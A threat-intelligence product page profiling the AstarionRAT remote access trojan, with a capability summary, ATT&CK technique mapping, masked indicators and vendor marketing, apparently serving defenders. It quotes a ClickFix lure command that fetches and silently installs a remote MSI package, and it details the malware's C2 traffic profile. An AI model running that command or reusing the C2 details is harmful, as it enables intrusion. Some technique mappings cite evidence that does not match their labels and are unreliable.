Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareRansomware

AstarionRAT

AstarionRAT is a custom remote access trojan first publicly documented by Huntress in February 2026 after being deployed in ClickFix intrusion chains that used the Matanbuchus 3.0 malware-as-a-service loader. In the observed campaigns, victims were socially engineered to execute malicious Run dialog or msiexec commands, leading to silent MSI installation, DLL sideloading, an embedded Lua interpreter, and reflective in-memory loading of the final payload, identified internally as Beacon.exe. Huntress reported that Matanbuchus delivered AstarionRAT via reflective PE loading from Lua. AstarionRAT supports 24 commands and is described as a fully featured custom implant with capabilities including credential theft, shell execution with output capture, SOCKS5 proxying, port scanning, file operations, process management, credential logon and impersonation, and reflective or in-memory loading of arbitrary operator-supplied code. Its command-and-control configuration is stored in the .data section as RC4-encrypted, hex-encoded data decrypted with a hardcoded 110-byte key. Reported C2 infrastructure includes www.ndibstersoft[.]com. The malware’s HTTP profile impersonates Edge/18.19045, uses GET requests to /intake/organizations/events?channel=app, includes Accept-Language: zh-CN,zh;q=0.9 and a Google referer, and embeds beacon data in a cookie header between static values including AFUAK=1C5DEC09609A6B41 and HFK=423b5828bc98f5c7c57e6c321. Huntress reported that AstarionRAT’s initial metadata beacon begins with a 0xBEEF marker, derives a session key from 16 random bytes hashed with SHA-256, and RSA-encrypts metadata using a hardcoded 1024-bit public key before transmission. The malware polls every 10 seconds and parses responses as network-byte-order [command_id][size][data] tuples. Observed post-compromise activity associated with infections delivering AstarionRAT included rapid hands-on-keyboard operations, PsExec and RDP lateral movement, rogue account creation, Microsoft Defender tampering, and targeting of Windows servers and domain controllers, with Huntress assessing the likely objective as ransomware deployment or data exfiltration.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

MITRE ATT&CK

Techniques & procedures

30 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

8 techniques
T1053.005Scheduled TaskEvidence1

"established persistence via a scheduled task named Application Maintenance"

T1059.001PowerShellEvidence1

"...leads to the execution of a PowerShell command... fetch a second-stage PowerShell script..."

T1059.003Windows Command ShellEvidence1

"Shell Execute... spawns CMD... captures output"; "wraps in CMD /C <command>"

T1059.006PythonEvidence2

"After decryption, the Lua script is straightforward; its only purpose is to decode and execute embedded shellcode."

T1106Native APIEvidence1

"walking the Process Environment Block to locate ntdll.dll and resolve four native API functions by hash"; "All API access is routed through an internal hash dispatch function"

T1204User ExecutionEvidence3

"The malware leverages the persistent “ClickFix” social engineering tactic, which tricks users into manually executing malicious commands... Victims are presented with deceptive prompts instructing them to copy and paste specific PowerShell or Run dialog commands."

T1204.002Malicious FileEvidence1

Step 1 - Social Engineering + Silent MSI T1204.002, T1218.007 | Operator ClickFix lure tricks user into executing mSiexeC.EXe -PaCkAGe hxxp://binclloudapp[.]com/temp/../ValidationID/../466943 /q

T1569.002Service ExecutionEvidence1

"used the RAT to start the Application Management service"

Persistence

2 techniques
T1053.005Scheduled TaskEvidence1

"established persistence via a scheduled task named Application Maintenance"

T1136Create AccountEvidence1

“...via PsExec, rogue account creation...”

Privilege Escalation

3 techniques
T1053.005Scheduled TaskEvidence1

"established persistence via a scheduled task named Application Maintenance"

T1055Process InjectionEvidence3

"...token manipulation, shellcode injection..."

T1134Access Token ManipulationEvidence2

"Steal Token... duplicates its token... applies it to the current thread"; "Credential Logon... LogonUserA... impersonates the resulting token"; "Revert to Self"

Stealth

5 techniques
T1027Obfuscated Files or InformationEvidence1

“...extract a password-protected archive (TMP412.7z with password...)... heavily padded with junk code... strings... encrypted... ChaCha20...”

T1055Process InjectionEvidence3

"...token manipulation, shellcode injection..."

T1134Access Token ManipulationEvidence2

"Steal Token... duplicates its token... applies it to the current thread"; "Credential Logon... LogonUserA... impersonates the resulting token"; "Revert to Self"

T1140Deobfuscate/Decode Files or InformationEvidence1

"hex-decodes the string, then RC4-decrypts it using a hardcoded 110-byte key"; "HTTP request templates are stored hex-encoded... decoded at runtime"

T1620Reflective Code LoadingEvidence3

Step 7 - Payload Delivery (AstarionRAT) AstarionRAT deployed via reflective PE loading from Lua interpreter.

Credential Access

2 techniques
T1003OS Credential DumpingEvidence1

"command set covers... credential theft and impersonation"

T1555Credentials from Password StoresEvidence1

“AstarionRAT … facilitate credential theft …” / “credential-harvesting loader … dscl . -authonly … ensuring the attacker obtained working credentials”

Discovery

5 techniques
T1016System Network Configuration DiscoveryEvidence1

"includes... the local IP address obtained via WSAIoctl"

T1033System Owner/User DiscoveryEvidence1

"tab-delimited string of the computer name, username, and process filename"

T1046Network Service DiscoveryEvidence2

“AstarionRAT... port scanning capabilities...”

T1057Process DiscoveryEvidence1

"List Processes... CreateToolhelp32Snapshot... Process32FirstW / Process32NextW"

T1083File and Directory DiscoveryEvidence1

"Directory Listing Enumerates files using FindFirstFileA / FindNextFileA"; "Get Current Directory"

Lateral Movement

1 technique
T1570Lateral Tool TransferEvidence1

“progressed from initial access to lateral movement to domain controllers via PsExec, rogue account creation, and Microsoft Defender exclusion staging.”

Command and Control

7 techniques
T1071.001Web ProtocolsEvidence3

Step 5 - C2 Registration + EDR Enumeration T1071.001, T1518.001 | Malware Main module registers with C2 via Protobuf-over-HTTPS (ChaCha20 encrypted, 32-byte key + 12-byte nonce prepended). C2 traffic masquerades as Skype Desktop application.

T1090ProxyEvidence1

"...support for... SOCKS5 tunneling..."; "...SOCKS proxy tunneling."

T1090.001Internal ProxyEvidence2

“AstarionRAT … supports … SOCKS5 proxy …”

T1090.003Multi-hop ProxyEvidence2

"...AstarionRAT... including credential theft and SOCKS5 proxying."

T1105Ingress Tool TransferEvidence1

"...msiexec command that fetches a payload from a newly registered domain."

T1219Remote Access ToolsEvidence1

"AstarionRAT is a new, full-featured RAT..." and "TrustConnect ... trying to disguise its remote access trojan (RAT) as a legitimate ... RMM tool"

T1573Encrypted ChannelEvidence1

"The entire packet is RSA-encrypted using a hardcoded 1024-bit public key"

Other

1 technique
T1562.001Disable or Modify ToolsEvidence2

“...Microsoft Defender exclusion staging.”

INDICATORS OF COMPROMISE

IOCs tracked for this family

6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
3 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
3 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app2 months ago
uri●●●●●●●●●●●●View more in app2 months ago
domain●●●●●●●●●●●●View more in app2 months ago
uri●●●●●●●●●●●●View more in app2 months ago
uri●●●●●●●●●●●●View more in app2 months ago
domain●●●●●●●●●●●●View more in app2 months ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching6

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping30

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.

AstarionRAT | Mallory